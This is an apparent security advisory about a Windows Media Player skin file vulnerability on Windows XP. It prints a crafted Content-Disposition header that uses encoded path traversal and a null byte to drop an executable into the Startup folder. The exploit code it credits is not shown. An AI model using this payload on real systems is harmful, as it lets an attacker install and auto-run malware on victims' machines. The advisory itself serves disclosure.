|
Microsoft Windows Media Player Skin File Code Execution Vulnerability
The following HTTP headers will cause a .exe file to be saved to the Windows Startup folder on Windows XP systems: Content-Disposition: filename=%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cDocuments%20and%20Settings%5CAll%20Users%5CStart%20Menu%5CPrograms%5CStartup%5csomefile.exe%00.wmz The following exploit code was provided by "jelmer" <jelmer@kuperus.xs4all.nl>: |
|
Privacy Statement |